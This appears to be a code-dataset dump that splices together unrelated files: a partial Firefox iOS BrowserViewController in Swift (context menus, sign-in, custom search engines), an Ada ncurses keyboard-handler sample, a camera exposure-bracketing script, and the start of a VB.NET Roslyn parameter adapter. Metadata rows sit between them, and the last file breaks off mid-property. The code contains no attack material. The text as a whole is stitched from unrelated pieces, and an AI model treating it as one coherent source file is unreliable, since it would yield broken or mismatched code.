func tabManagerDidRemoveAllTabs(_ tabManager: TabManager, toast: ButtonToast?) {
guard let toast = toast, !(tabTrayController?.tabDisplayManager.isPrivate ?? false) else {
return
}
show(toast: toast, afterWaiting: ButtonToastUX.ToastDelay)
}
fileprivate func updateTabCountUsingTabManager(_ tabManager: TabManager, animated: Bool = true) {
if let selectedTab = tabManager.selectedTab {
let count = selectedTab.isPrivate ? tabManager.privateTabs.count : tabManager.normalTabs.count
toolbar?.updateTabCount(count, animated: animated)
urlBar.updateTabCount(count, animated: !urlBar.inOverlayMode)
topTabsViewController?.updateTabCount(count, animated: animated)
}
}
}
// MARK: - UIPopoverPresentationControllerDelegate
extension BrowserViewController: UIPopoverPresentationControllerDelegate {
func popoverPresentationControllerDidDismissPopover(_ popoverPresentationController: UIPopoverPresentationController) {
displayedPopoverController = nil
updateDisplayedPopoverProperties = nil
}
}
extension BrowserViewController: UIAdaptivePresentationControllerDelegate {
// Returning None here makes sure that the Popover is actually presented as a Popover and
// not as a full-screen modal, which is the default on compact device classes.
func adaptivePresentationStyle(for controller: UIPresentationController, traitCollection: UITraitCollection) -> UIModalPresentationStyle {
return .none
}
}
extension BrowserViewController: IntroViewControllerDelegate {
@discardableResult func presentIntroViewController(_ force: Bool = false, animated: Bool = true) -> Bool {
if let deeplink = self.profile.prefs.stringForKey("AdjustDeeplinkKey"), let url = URL(string: deeplink) {
self.launchFxAFromDeeplinkURL(url)
return true
}
if force || profile.prefs.intForKey(PrefsKeys.IntroSeen) == nil {
let introViewController = IntroViewController()
introViewController.delegate = self
// On iPad we present it modally in a controller
if topTabsVisible {
introViewController.preferredContentSize = CGSize(width: IntroUX.Width, height: IntroUX.Height)
introViewController.modalPresentationStyle = .formSheet
}
present(introViewController, animated: animated) {
// On first run (and forced) open up the homepage in the background.
if let homePageURL = HomePageAccessors.getHomePage(self.profile.prefs), let tab = self.tabManager.selectedTab, DeviceInfo.hasConnectivity() {
tab.loadRequest(URLRequest(url: homePageURL))
}
}
return true
}
return false
}
func launchFxAFromDeeplinkURL(_ url: URL) {
self.profile.prefs.removeObjectForKey("AdjustDeeplinkKey")
var query = url.getQuery()
query["entrypoint"] = "adjust_deepklink_ios"
let fxaParams: FxALaunchParams
fxaParams = FxALaunchParams(query: query)
self.presentSignInViewController(fxaParams)
}
func introViewControllerDidFinish(_ introViewController: IntroViewController, requestToLogin: Bool) {
self.profile.prefs.setInt(1, forKey: PrefsKeys.IntroSeen)
introViewController.dismiss(animated: true) {
if self.navigationController?.viewControllers.count ?? 0 > 1 {
_ = self.navigationController?.popToRootViewController(animated: true)
}
if requestToLogin {
let fxaParams = FxALaunchParams(query: ["entrypoint": "firstrun"])
self.presentSignInViewController(fxaParams)
}
}
}
func presentSignInViewController(_ fxaOptions: FxALaunchParams? = nil) {
// Show the settings page if we have already signed in. If we haven't then show the signin page
let vcToPresent: UIViewController
if profile.hasAccount(), let status = profile.getAccount()?.actionNeeded, status == .none {
let settingsTableViewController = SyncContentSettingsViewController()
settingsTableViewController.profile = profile
vcToPresent = settingsTableViewController
} else {
let signInVC = FxAContentViewController(profile: profile, fxaOptions: fxaOptions)
signInVC.delegate = self
vcToPresent = signInVC
}
vcToPresent.navigationItem.rightBarButtonItem = UIBarButtonItem(barButtonSystemItem: .done, target: self, action: #selector(dismissSignInViewController))
let themedNavigationController = ThemedNavigationController(rootViewController: vcToPresent)
themedNavigationController.modalPresentationStyle = .formSheet
themedNavigationController.navigationBar.isTranslucent = false
self.present(themedNavigationController, animated: true, completion: nil)
}
@objc func dismissSignInViewController() {
self.dismiss(animated: true, completion: nil)
}
}
extension BrowserViewController: FxAContentViewControllerDelegate {
func contentViewControllerDidSignIn(_ viewController: FxAContentViewController, withFlags flags: FxALoginFlags) {
if flags.verified {
self.dismiss(animated: true, completion: nil)
}
}
func contentViewControllerDidCancel(_ viewController: FxAContentViewController) {
self.dismiss(animated: true, completion: nil)
}
}
extension BrowserViewController: ContextMenuHelperDelegate {
func contextMenuHelper(_ contextMenuHelper: ContextMenuHelper, didLongPressElements elements: ContextMenuHelper.Elements, gestureRecognizer: UIGestureRecognizer) {
// locationInView can return (0, 0) when the long press is triggered in an invalid page
// state (e.g., long pressing a link before the document changes, then releasing after a
// different page loads).
let touchPoint = gestureRecognizer.location(in: view)
guard touchPoint != CGPoint.zero else { return }
let touchSize = CGSize(width: 0, height: 16)
let actionSheetController = AlertController(title: nil, message: nil, preferredStyle: .actionSheet)
var dialogTitle: String?
if let url = elements.link, let currentTab = tabManager.selectedTab {
dialogTitle = url.absoluteString
let isPrivate = currentTab.isPrivate
let addTab = { (rURL: URL, isPrivate: Bool) in
let tab = self.tabManager.addTab(URLRequest(url: rURL as URL), afterTab: currentTab, isPrivate: isPrivate)
LeanPlumClient.shared.track(event: .openedNewTab, withParameters: ["Source": "Long Press Context Menu"])
guard !self.topTabsVisible else {
return
}
// We're not showing the top tabs; show a toast to quick switch to the fresh new tab.
let toast = ButtonToast(labelText: Strings.ContextMenuButtonToastNewTabOpenedLabelText, buttonText: Strings.ContextMenuButtonToastNewTabOpenedButtonText, completion: { buttonPressed in
if buttonPressed {
self.tabManager.selectTab(tab)
}
})
self.show(toast: toast)
}
if !isPrivate {
let newTabTitle = NSLocalizedString("Open in New Tab", comment: "Context menu item for opening a link in a new tab")
let openNewTabAction = UIAlertAction(title: newTabTitle, style: .default) { _ in
addTab(url, false)
}
actionSheetController.addAction(openNewTabAction, accessibilityIdentifier: "linkContextMenu.openInNewTab")
}
let openNewPrivateTabTitle = NSLocalizedString("Open in New Private Tab", tableName: "PrivateBrowsing", comment: "Context menu option for opening a link in a new private tab")
let openNewPrivateTabAction = UIAlertAction(title: openNewPrivateTabTitle, style: .default) { _ in
addTab(url, true)
}
actionSheetController.addAction(openNewPrivateTabAction, accessibilityIdentifier: "linkContextMenu.openInNewPrivateTab")
let downloadTitle = NSLocalizedString("Download Link", comment: "Context menu item for downloading a link URL")
let downloadAction = UIAlertAction(title: downloadTitle, style: .default) { _ in
self.pendingDownloadWebView = currentTab.webView
currentTab.webView?.evaluateJavaScript("window.__firefox__.download('\(url.absoluteString)', '\(UserScriptManager.securityToken)')")
UnifiedTelemetry.recordEvent(category: .action, method: .tap, object: .downloadLinkButton)
}
actionSheetController.addAction(downloadAction, accessibilityIdentifier: "linkContextMenu.download")
let copyTitle = NSLocalizedString("Copy Link", comment: "Context menu item for copying a link URL to the clipboard")
let copyAction = UIAlertAction(title: copyTitle, style: .default) { _ in
UIPasteboard.general.url = url as URL
}
actionSheetController.addAction(copyAction, accessibilityIdentifier: "linkContextMenu.copyLink")
let shareTitle = NSLocalizedString("Share Link", comment: "Context menu item for sharing a link URL")
let shareAction = UIAlertAction(title: shareTitle, style: .default) { _ in
self.presentActivityViewController(url as URL, sourceView: self.view, sourceRect: CGRect(origin: touchPoint, size: touchSize), arrowDirection: .any)
}
actionSheetController.addAction(shareAction, accessibilityIdentifier: "linkContextMenu.share")
}
if let url = elements.image {
if dialogTitle == nil {
dialogTitle = url.absoluteString
}
let photoAuthorizeStatus = PHPhotoLibrary.authorizationStatus()
let saveImageTitle = NSLocalizedString("Save Image", comment: "Context menu item for saving an image")
let saveImageAction = UIAlertAction(title: saveImageTitle, style: .default) { _ in
if photoAuthorizeStatus == .authorized || photoAuthorizeStatus == .notDetermined {
self.getImageData(url as URL) { data in
PHPhotoLibrary.shared().performChanges({
PHAssetCreationRequest.forAsset().addResource(with: .photo, data: data, options: nil)
})
}
} else {
let accessDenied = UIAlertController(title: NSLocalizedString("Firefox would like to access your Photos", comment: "See http://mzl.la/1G7uHo7"), message: NSLocalizedString("This allows you to save the image to your Camera Roll.", comment: "See http://mzl.la/1G7uHo7"), preferredStyle: .alert)
let dismissAction = UIAlertAction(title: Strings.CancelString, style: .default, handler: nil)
accessDenied.addAction(dismissAction)
let settingsAction = UIAlertAction(title: NSLocalizedString("Open Settings", comment: "See http://mzl.la/1G7uHo7"), style: .default ) { _ in
UIApplication.shared.open(URL(string: UIApplicationOpenSettingsURLString)!, options: [:])
}
accessDenied.addAction(settingsAction)
self.present(accessDenied, animated: true, completion: nil)
}
}
actionSheetController.addAction(saveImageAction, accessibilityIdentifier: "linkContextMenu.saveImage")
let copyImageTitle = NSLocalizedString("Copy Image", comment: "Context menu item for copying an image to the clipboard")
let copyAction = UIAlertAction(title: copyImageTitle, style: .default) { _ in
// put the actual image on the clipboard
// do this asynchronously just in case we're in a low bandwidth situation
let pasteboard = UIPasteboard.general
pasteboard.url = url as URL
let changeCount = pasteboard.changeCount
let application = UIApplication.shared
var taskId: UIBackgroundTaskIdentifier = 0
taskId = application.beginBackgroundTask (expirationHandler: {
application.endBackgroundTask(taskId)
})
Alamofire.request(url).validate(statusCode: 200..<300).response { response in
// Only set the image onto the pasteboard if the pasteboard hasn't changed since
// fetching the image; otherwise, in low-bandwidth situations,
// we might be overwriting something that the user has subsequently added.
if changeCount == pasteboard.changeCount, let imageData = response.data, response.error == nil {
pasteboard.addImageWithData(imageData, forURL: url)
}
application.endBackgroundTask(taskId)
}
}
actionSheetController.addAction(copyAction, accessibilityIdentifier: "linkContextMenu.copyImage")
}
// If we're showing an arrow popup, set the anchor to the long press location.
if let popoverPresentationController = actionSheetController.popoverPresentationController {
popoverPresentationController.sourceView = view
popoverPresentationController.sourceRect = CGRect(origin: touchPoint, size: touchSize)
popoverPresentationController.permittedArrowDirections = .any
popoverPresentationController.delegate = self
}
if actionSheetController.popoverPresentationController != nil {
displayedPopoverController = actionSheetController
}
actionSheetController.title = dialogTitle?.ellipsize(maxLength: ActionSheetTitleMaxLength)
let cancelAction = UIAlertAction(title: Strings.CancelString, style: UIAlertActionStyle.cancel, handler: nil)
actionSheetController.addAction(cancelAction)
self.present(actionSheetController, animated: true, completion: nil)
}
fileprivate func getImageData(_ url: URL, success: @escaping (Data) -> Void) {
Alamofire.request(url).validate(statusCode: 200..<300).response { response in
if let data = response.data {
success(data)
}
}
}
func contextMenuHelper(_ contextMenuHelper: ContextMenuHelper, didCancelGestureRecognizer: UIGestureRecognizer) {
displayedPopoverController?.dismiss(animated: true) {
self.displayedPopoverController = nil
}
}
}
extension BrowserViewController {
@objc func image(_ image: UIImage, didFinishSavingWithError error: NSError?, contextInfo: UnsafeRawPointer) {
if error == nil {
LeanPlumClient.shared.track(event: .saveImage)
}
}
}
extension BrowserViewController: HistoryStateHelperDelegate {
func historyStateHelper(_ historyStateHelper: HistoryStateHelper, didPushOrReplaceStateInTab tab: Tab) {
navigateInTab(tab: tab)
tabManager.storeChanges()
}
}
/**
A third party search engine Browser extension
**/
extension BrowserViewController {
func addCustomSearchButtonToWebView(_ webView: WKWebView) {
//check if the search engine has already been added.
let domain = webView.url?.domainURL.host
let matches = self.profile.searchEngines.orderedEngines.filter {$0.shortName == domain}
if !matches.isEmpty {
self.customSearchEngineButton.tintColor = UIColor.Photon.Grey50
self.customSearchEngineButton.isUserInteractionEnabled = false
} else {
self.customSearchEngineButton.tintColor = UIConstants.SystemBlueColor
self.customSearchEngineButton.isUserInteractionEnabled = true
}
/*
This is how we access hidden views in the WKContentView
Using the public headers we can find the keyboard accessoryView which is not usually available.
Specific values here are from the WKContentView headers.
https://github.com/JaviSoto/iOS9-Runtime-Headers/blob/master/Frameworks/WebKit.framework/WKContentView.h
*/
guard let webContentView = UIView.findSubViewWithFirstResponder(webView) else {
/*
In some cases the URL bar can trigger the keyboard notification. In that case the webview isnt the first responder
and a search button should not be added.
*/
return
}
guard let input = webContentView.perform(#selector(getter: UIResponder.inputAccessoryView)),
let inputView = input.takeUnretainedValue() as? UIInputView,
let nextButton = inputView.value(forKey: "_nextItem") as? UIBarButtonItem,
let nextButtonView = nextButton.value(forKey: "view") as? UIView else {
//failed to find the inputView instead lets use the inputAssistant
addCustomSearchButtonToInputAssistant(webContentView)
return
}
inputView.addSubview(self.customSearchEngineButton)
self.customSearchEngineButton.snp.remakeConstraints { make in
make.leading.equalTo(nextButtonView.snp.trailing).offset(20)
make.width.equalTo(inputView.snp.height)
make.top.equalTo(nextButtonView.snp.top)
make.height.equalTo(inputView.snp.height)
}
}
/**
This adds the customSearchButton to the inputAssistant
for cases where the inputAccessoryView could not be found for example
on the iPad where it does not exist. However this only works on iOS9
**/
func addCustomSearchButtonToInputAssistant(_ webContentView: UIView) {
guard customSearchBarButton == nil else {
return //The searchButton is already on the keyboard
}
let inputAssistant = webContentView.inputAssistantItem
let item = UIBarButtonItem(customView: customSearchEngineButton)
customSearchBarButton = item
_ = Try(withTry: {
inputAssistant.trailingBarButtonGroups.last?.barButtonItems.append(item)
}) { (exception) in
Sentry.shared.send(message: "Failed adding custom search button to input assistant", tag: .general, severity: .error, description: "\(exception ??? "nil")")
}
}
@objc func addCustomSearchEngineForFocusedElement() {
guard let webView = tabManager.selectedTab?.webView else {
return
}
webView.evaluateJavaScript("__firefox__.searchQueryForField()") { (result, _) in
guard let searchQuery = result as? String, let favicon = self.tabManager.selectedTab!.displayFavicon else {
//Javascript responded with an incorrectly formatted message. Show an error.
let alert = ThirdPartySearchAlerts.failedToAddThirdPartySearch()
self.present(alert, animated: true, completion: nil)
return
}
self.addSearchEngine(searchQuery, favicon: favicon)
self.customSearchEngineButton.tintColor = UIColor.Photon.Grey50
self.customSearchEngineButton.isUserInteractionEnabled = false
}
}
func addSearchEngine(_ searchQuery: String, favicon: Favicon) {
guard searchQuery != "",
let iconURL = URL(string: favicon.url),
let url = URL(string: searchQuery.addingPercentEncoding(withAllowedCharacters: CharacterSet.urlFragmentAllowed)!),
let shortName = url.domainURL.host else {
let alert = ThirdPartySearchAlerts.failedToAddThirdPartySearch()
self.present(alert, animated: true, completion: nil)
return
}
let alert = ThirdPartySearchAlerts.addThirdPartySearchEngine { alert in
self.customSearchEngineButton.tintColor = UIColor.Photon.Grey50
self.customSearchEngineButton.isUserInteractionEnabled = false
SDWebImageManager.shared().loadImage(with: iconURL, options: .continueInBackground, progress: nil) { (image, _, _, _, _, _) in
guard let image = image else {
let alert = ThirdPartySearchAlerts.failedToAddThirdPartySearch()
self.present(alert, animated: true, completion: nil)
return
}
self.profile.searchEngines.addSearchEngine(OpenSearchEngine(engineID: nil, shortName: shortName, image: image, searchTemplate: searchQuery, suggestTemplate: nil, isCustomEngine: true))
let Toast = SimpleToast()
Toast.showAlertWithText(Strings.ThirdPartySearchEngineAdded, bottomContainer: self.webViewContainer)
}
}
self.present(alert, animated: true, completion: {})
}
}
extension BrowserViewController: KeyboardHelperDelegate {
func keyboardHelper(_ keyboardHelper: KeyboardHelper, keyboardWillShowWithState state: KeyboardState) {
keyboardState = state
updateViewConstraints()
UIView.animate(withDuration: state.animationDuration) {
UIView.setAnimationCurve(state.animationCurve)
self.alertStackView.layoutIfNeeded()
}
guard let webView = tabManager.selectedTab?.webView else {
return
}
webView.evaluateJavaScript("__firefox__.searchQueryForField()") { (result, _) in
guard let _ = result as? String else {
return
}
self.addCustomSearchButtonToWebView(webView)
}
}
func keyboardHelper(_ keyboardHelper: KeyboardHelper, keyboardDidShowWithState state: KeyboardState) {
}
func keyboardHelper(_ keyboardHelper: KeyboardHelper, keyboardWillHideWithState state: KeyboardState) {
keyboardState = nil
updateViewConstraints()
//If the searchEngineButton exists remove it form the keyboard
if let buttonGroup = customSearchBarButton?.buttonGroup {
buttonGroup.barButtonItems = buttonGroup.barButtonItems.filter { $0 != customSearchBarButton }
customSearchBarButton = nil
}
if self.customSearchEngineButton.superview != nil {
self.customSearchEngineButton.removeFromSuperview()
}
UIView.animate(withDuration: state.animationDuration) {
UIView.setAnimationCurve(state.animationCurve)
self.alertStackView.layoutIfNeeded()
}
}
}
extension BrowserViewController: SessionRestoreHelperDelegate {
func sessionRestoreHelper(_ helper: SessionRestoreHelper, didRestoreSessionForTab tab: Tab) {
tab.restoring = false
if let tab = tabManager.selectedTab, tab.webView === tab.webView {
updateUIForReaderHomeStateForTab(tab)
}
}
}
extension BrowserViewController: TabTrayDelegate {
// This function animates and resets the tab chrome transforms when
// the tab tray dismisses.
func tabTrayDidDismiss(_ tabTray: TabTrayController) {
resetBrowserChrome()
}
func tabTrayDidAddTab(_ tabTray: TabTrayController, tab: Tab) {}
func tabTrayDidAddBookmark(_ tab: Tab) {
guard let url = tab.url?.absoluteString, !url.isEmpty else { return }
self.addBookmark(tab.tabState)
}
func tabTrayDidAddToReadingList(_ tab: Tab) -> ReadingListItem? {
guard let url = tab.url?.absoluteString, !url.isEmpty else { return nil }
return profile.readingList.createRecordWithURL(url, title: tab.title ?? url, addedBy: UIDevice.current.name).value.successValue
}
func tabTrayRequestsPresentationOf(_ viewController: UIViewController) {
self.present(viewController, animated: false, completion: nil)
}
}
// MARK: Browser Chrome Theming
extension BrowserViewController: Themeable {
func applyTheme() {
let ui: [Themeable?] = [urlBar, toolbar, readerModeBar, topTabsViewController, homePanelController, searchController]
ui.forEach { $0?.applyTheme() }
statusBarOverlay.backgroundColor = shouldShowTopTabsForTraitCollection(traitCollection) ? UIColor.Photon.Grey80 : urlBar.backgroundColor
setNeedsStatusBarAppearanceUpdate()
(presentedViewController as? Themeable)?.applyTheme()
}
}
extension BrowserViewController: JSPromptAlertControllerDelegate {
func promptAlertControllerDidDismiss(_ alertController: JSPromptAlertController) {
showQueuedAlertIfAvailable()
}
}
extension BrowserViewController: TopTabsDelegate {
func topTabsDidPressTabs() {
urlBar.leaveOverlayMode(didCancel: true)
self.urlBarDidPressTabs(urlBar)
}
func topTabsDidPressNewTab(_ isPrivate: Bool) {
openBlankNewTab(focusLocationField: false, isPrivate: isPrivate)
}
func topTabsDidTogglePrivateMode() {
guard let _ = tabManager.selectedTab else {
return
}
urlBar.leaveOverlayMode()
}
func topTabsDidChangeTab() {
urlBar.leaveOverlayMode(didCancel: true)
}
}
extension BrowserViewController: ClientPickerViewControllerDelegate, InstructionsViewControllerDelegate {
func instructionsViewControllerDidClose(_ instructionsViewController: InstructionsViewController) {
self.popToBVC()
}
func clientPickerViewControllerDidCancel(_ clientPickerViewController: ClientPickerViewController) {
self.popToBVC()
}
func clientPickerViewController(_ clientPickerViewController: ClientPickerViewController, didPickClients clients: [RemoteClient]) {
guard let tab = tabManager.selectedTab, let url = tab.canonicalURL?.displayURL?.absoluteString else { return }
let shareItem = ShareItem(url: url, title: tab.title, favicon: tab.displayFavicon)
guard shareItem.isShareable else {
let alert = UIAlertController(title: Strings.SendToErrorTitle, message: Strings.SendToErrorMessage, preferredStyle: .alert)
alert.addAction(UIAlertAction(title: Strings.SendToErrorOKButton, style: .default) { _ in self.popToBVC()})
present(alert, animated: true, completion: nil)
return
}
profile.sendItem(shareItem, toClients: clients).uponQueue(.main) { _ in
self.popToBVC()
}
}
}
| Swift | 5 | xjc90s/swift | utils/parser-lib/profile-input.swift | [
"Apache-2.0"
] |
------------------------------------------------------------------------------
-- --
-- GNAT ncurses Binding Samples --
-- --
-- Sample.Keyboard_Handler --
-- --
-- B O D Y --
-- --
------------------------------------------------------------------------------
-- Copyright (c) 1998-2006,2011 Free Software Foundation, Inc. --
-- --
-- Permission is hereby granted, free of charge, to any person obtaining a --
-- copy of this software and associated documentation files (the --
-- "Software"), to deal in the Software without restriction, including --
-- without limitation the rights to use, copy, modify, merge, publish, --
-- distribute, distribute with modifications, sublicense, and/or sell --
-- copies of the Software, and to permit persons to whom the Software is --
-- furnished to do so, subject to the following conditions: --
-- --
-- The above copyright notice and this permission notice shall be included --
-- in all copies or substantial portions of the Software. --
-- --
-- THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS --
-- OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF --
-- MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. --
-- IN NO EVENT SHALL THE ABOVE COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, --
-- DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR --
-- OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR --
-- THE USE OR OTHER DEALINGS IN THE SOFTWARE. --
-- --
-- Except as contained in this notice, the name(s) of the above copyright --
-- holders shall not be used in advertising or otherwise to promote the --
-- sale, use or other dealings in this Software without prior written --
-- authorization. --
------------------------------------------------------------------------------
-- Author: Juergen Pfeifer, 1996
-- Version Control
-- $Revision: 1.16 $
-- $Date: 2011/03/23 00:34:24 $
-- Binding Version 01.00
------------------------------------------------------------------------------
with Ada.Strings; use Ada.Strings;
with Ada.Strings.Fixed; use Ada.Strings.Fixed;
with Ada.Strings.Maps.Constants; use Ada.Strings.Maps.Constants;
with Ada.Characters.Latin_1; use Ada.Characters.Latin_1;
with Ada.Characters.Handling; use Ada.Characters.Handling;
with Terminal_Interface.Curses.Panels; use Terminal_Interface.Curses.Panels;
with Terminal_Interface.Curses.Forms; use Terminal_Interface.Curses.Forms;
with Terminal_Interface.Curses.Forms.Field_Types.Enumeration;
use Terminal_Interface.Curses.Forms.Field_Types.Enumeration;
with Sample.Header_Handler; use Sample.Header_Handler;
with Sample.Form_Demo.Aux; use Sample.Form_Demo.Aux;
with Sample.Manifest; use Sample.Manifest;
with Sample.Form_Demo.Handler;
-- This package contains a centralized keyboard handler used throughout
-- this example. The handler establishes a timeout mechanism that provides
-- periodical updates of the common header lines used in this example.
--
package body Sample.Keyboard_Handler is
In_Command : Boolean := False;
function Get_Key (Win : Window := Standard_Window) return Real_Key_Code
is
K : Real_Key_Code;
function Command return Real_Key_Code;
function Command return Real_Key_Code
is
function My_Driver (F : Form;
C : Key_Code;
P : Panel) return Boolean;
package Fh is new Sample.Form_Demo.Handler (My_Driver);
type Label_Array is array (Label_Number) of String (1 .. 8);
Labels : Label_Array;
FA : Field_Array_Access := new Field_Array'
(Make (0, 0, "Command:"),
Make (Top => 0, Left => 9, Width => Columns - 11),
Null_Field);
K : Real_Key_Code := Key_None;
N : Natural := 0;
function My_Driver (F : Form;
C : Key_Code;
P : Panel) return Boolean
is
Ch : Character;
begin
if P = Null_Panel then
raise Panel_Exception;
end if;
if C in User_Key_Code'Range and then C = QUIT then
if Driver (F, F_Validate_Field) = Form_Ok then
K := Key_None;
return True;
end if;
elsif C in Normal_Key_Code'Range then
Ch := Character'Val (C);
if Ch = LF or else Ch = CR then
if Driver (F, F_Validate_Field) = Form_Ok then
declare
Buffer : String (1 .. Positive (Columns - 11));
Cmdc : String (1 .. 8);
begin
Get_Buffer (Fld => FA.all (2), Str => Buffer);
Trim (Buffer, Left);
if Buffer (1) /= ' ' then
Cmdc := To_Upper (Buffer (Cmdc'Range));
for I in Labels'Range loop
if Cmdc = Labels (I) then
K := Function_Key_Code
(Function_Key_Number (I));
exit;
end if;
end loop;
end if;
return True;
end;
end if;
end if;
end if;
return False;
end My_Driver;
begin
In_Command := True;
for I in Label_Number'Range loop
Get_Soft_Label_Key (I, Labels (I));
Trim (Labels (I), Left);
Translate (Labels (I), Upper_Case_Map);
if Labels (I) (1) /= ' ' then
N := N + 1;
end if;
end loop;
if N > 0 then -- some labels were really set
declare
Enum_Info : Enumeration_Info (N);
Enum_Field : Enumeration_Field;
J : Positive := Enum_Info.Names'First;
Frm : Form := Create (FA);
begin
for I in Label_Number'Range loop
if Labels (I) (1) /= ' ' then
Enum_Info.Names (J) := new String'(Labels (I));
J := J + 1;
end if;
end loop;
Enum_Field := Create (Enum_Info, True);
Set_Field_Type (FA.all (2), Enum_Field);
Set_Background (FA.all (2), Normal_Video);
Fh.Drive_Me (Frm, Lines - 3, 0);
Delete (Frm);
Update_Panels; Update_Screen;
end;
end if;
Free (FA, True);
In_Command := False;
return K;
end Command;
begin
Set_Timeout_Mode (Win, Delayed, 30000);
loop
K := Get_Keystroke (Win);
if K = Key_None then -- a timeout occurred
Update_Header_Window;
elsif K = 3 and then not In_Command then -- CTRL-C
K := Command;
exit when K /= Key_None;
else
exit;
end if;
end loop;
return K;
end Get_Key;
procedure Init_Keyboard_Handler is
begin
null;
end Init_Keyboard_Handler;
end Sample.Keyboard_Handler;
| Ada | 3 | CandyROM/external_libncurses | Ada95/samples/sample-keyboard_handler.adb | [
"X11"
] |
t app appmode photo
sleep 2
#
#t ia2 -ae still_exp 100 1750 #1/1600 sec
#t app button shutter PR
#sleep 2
#
#t ia2 -ae still_exp 100 1700 #1/1250 sec
#t app button shutter PR
#sleep 2
#
#t ia2 -ae still_exp 100 1655 #1/1000 sec
#t app button shutter PR
#sleep 2
#
#t ia2 -ae still_exp 100 1615 #1/800 sec
#t app button shutter PR
#sleep 2
#
#t ia2 -ae still_exp 100 1575 #1/640 sec
#t app button shutter PR
#sleep 2
#
#t ia2 -ae still_exp 100 1530 #1/500 sec
#t app button shutter PR
#sleep 2
#
#t ia2 -ae still_exp 100 1490 #1/400 sec
#t app button shutter PR
#sleep 2
#
#t ia2 -ae still_exp 100 1450 #1/320 sec
#t app button shutter PR
#sleep 2
#
#t ia2 -ae still_exp 100 1400 #1/250 sec
#t app button shutter PR
#sleep 2
#
#t ia2 -ae still_exp 100 1360 #1/200 sec
#t app button shutter PR
#sleep 2
#
#t ia2 -ae still_exp 100 1320 #1/160 sec
#t app button shutter PR
#sleep 2
#
#t ia2 -ae still_exp 100 1280 #1/125 sec
#t app button shutter PR
#sleep 2
#
#t ia2 -ae still_exp 100 1240 #1/100 sec
#t app button shutter PR
#sleep 2
#
#t ia2 -ae still_exp 100 1200 #1/80 sec
#t app button shutter PR
#sleep 2
#
t ia2 -ae still_exp 100 1150 #1/60 sec
t app button shutter PR
sleep 2
#
t ia2 -ae still_exp 100 1100
t app button shutter PR
sleep 2
#
t ia2 -ae still_exp 100 1050
t app button shutter PR
sleep 2
#
t ia2 -ae still_exp 100 1000
t app button shutter PR
sleep 2
#
t ia2 -ae still_exp 100 950
t app button shutter PR
sleep 2
#
t ia2 -ae still_exp 100 900
t app button shutter PR
sleep 2
#
t ia2 -ae still_exp 100 850
t app button shutter PR
sleep 2
| AGS Script | 2 | waltersgrey/autoexechack | HDRPhoto/HERO3Black/autoexec.ash | [
"MIT"
] |
' Licensed to the .NET Foundation under one or more agreements.
' The .NET Foundation licenses this file to you under the MIT license.
' See the LICENSE file in the project root for more information.
Imports System.Collections.Immutable
Imports Microsoft.Cci
Imports Microsoft.CodeAnalysis.CodeGen
Imports Microsoft.CodeAnalysis.Emit
Imports Microsoft.CodeAnalysis.VisualBasic.Emit
Namespace Microsoft.CodeAnalysis.VisualBasic.Symbols
#If DEBUG Then
Partial Friend Class ParameterSymbolAdapter
Inherits SymbolAdapter
#Else
Partial Friend Class ParameterSymbol
#End If
Implements IParameterTypeInformation
Implements IParameterDefinition
Private ReadOnly Property IParameterTypeInformationCustomModifiers As ImmutableArray(Of Cci.ICustomModifier) Implements IParameterTypeInformation.CustomModifiers
Get
Return AdaptedParameterSymbol.CustomModifiers.As(Of Cci.ICustomModifier)
End Get
End Property
Private ReadOnly Property IParameterTypeInformationRefCustomModifiers As ImmutableArray(Of Cci.ICustomModifier) Implements IParameterTypeInformation.RefCustomModifiers
Get
Return AdaptedParameterSymbol.RefCustomModifiers.As(Of Cci.ICustomModifier)
End Get
End Property
Private ReadOnly Property IParameterTypeInformationIsByReference As Boolean Implements IParameterTypeInformation.IsByReference
Get
Return AdaptedParameterSymbol.IsByRef
End Get
End Property
Private Function IParameterTypeInformationGetType(context As EmitContext) As ITypeReference Implements IParameterTypeInformation.GetType
Dim moduleBeingBuilt As PEModuleBuilder = DirectCast(context.Module, PEModuleBuilder)
Dim paramType As TypeSymbol = AdaptedParameterSymbol.Type
Return moduleBeingBuilt.Translate(paramType, syntaxNodeOpt:=DirectCast(context.SyntaxNode, VisualBasicSyntaxNode), diagnostics:=context.Diagnostics)
End Function
Private ReadOnly Property IParameterListEntryIndex As UShort Implements IParameterListEntry.Index
Get
Return CType(AdaptedParameterSymbol.Ordinal, UShort)
End Get
End Property
Private Function IParameterDefinition_GetDefaultValue(context As EmitContext) As MetadataConstant Implements IParameterDefinition.GetDefaultValue
CheckDefinitionInvariant()
Return Me.GetMetadataConstantValue(context)
End Function
Friend Function GetMetadataConstantValue(context As EmitContext) As MetadataConstant
If AdaptedParameterSymbol.HasMetadataConstantValue Then
Return DirectCast(context.Module, PEModuleBuilder).CreateConstant(AdaptedParameterSymbol.Type, AdaptedParameterSymbol.ExplicitDefaultConstantValue.Value, syntaxNodeOpt:=DirectCast(context.SyntaxNode, VisualBasicSyntaxNode), diagnostics:=context.Diagnostics)
Else
Return Nothing
End If
End Function
Private ReadOnly Property IParameterDefinition_HasDefaultValue As Boolean Implements IParameterDefinition.HasDefaultValue
Get
CheckDefinitionInvariant()
Return AdaptedParameterSymbol.HasMetadataConstantValue
End Get
End Property
Private ReadOnly Property IParameterDefinitionIsOptional As Boolean Implements IParameterDefinition.IsOptional
Get
CheckDefinitionInvariant()
Return AdaptedParameterSymbol.IsMetadataOptional
End Get
End Property
Private ReadOnly Property IParameterDefinitionIsIn As Boolean Implements IParameterDefinition.IsIn
Get
CheckDefinitionInvariant()
Return AdaptedParameterSymbol.IsMetadataIn
End Get
End Property
Private ReadOnly Property IParameterDefinitionIsOut As Boolean Implements IParameterDefinition.IsOut
Get
CheckDefinitionInvariant()
Return AdaptedParameterSymbol.IsMetadataOut
End Get
End Property
Private ReadOnly Property IParameterDefinitionIsMarshalledExplicitly As Boolean Implements IParameterDefinition.IsMarshalledExplicitly
Get
CheckDefinitionInvariant()
Return AdaptedParameterSymbol.IsMarshalledExplicitly
End Get
End Property
Private ReadOnly Property IParameterDefinitionMarshallingInformation As IMarshallingInformation Implements IParameterDefinition.MarshallingInformation
Get
CheckDefinitionInvariant()
